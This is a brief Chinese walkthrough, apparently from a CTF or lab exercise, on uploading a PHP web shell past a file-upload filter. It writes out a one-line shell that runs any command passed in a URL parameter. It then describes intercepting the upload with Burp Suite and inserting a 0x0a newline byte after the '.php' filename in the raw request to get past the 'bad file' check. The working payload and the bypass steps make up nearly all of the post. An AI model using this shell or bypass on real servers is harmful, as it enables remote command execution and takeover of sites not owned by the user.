Web页面:
新建一个一句话木马:
0.php
<?php system($_GET[0]); ?>上传木马, burpsuite 抓包。
直接上传是回显 bad file。
我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。
send 后,我们访问一下。发现木马上传成功。
相关推荐
Love Song残响6 小时前
深入解析TCP/IP协议栈:从底层到应用层ISACA中国7 小时前
2026年网络安全与AI趋势预测线束线缆组件品替网7 小时前
IO Audio Technologies 音频线缆抗干扰与带宽设计要点布谷歌7 小时前
开发笔记:如何消除秘钥数据对RPC负荷、日志、系统安全的伤害?咒法师无翅鱼7 小时前
【西电计网学习笔记】网络层【RIP,OSPF,ARP,ICMP,IGMP,逻辑寻址(ABCD四类)】Ares-Wang7 小时前
网络》》以太网交换安全XiaoHu02077 小时前
Linux网络编程套接字以太浮标8 小时前
华为eNSP模拟器综合实验之- VLAN聚合(VLAN Aggregation或Super VLAN)解析九成宫8 小时前
计算机网络期末复习——第4章:网络层 Part Three23zhgjx-zgx9 小时前
SQL注入攻击分析报告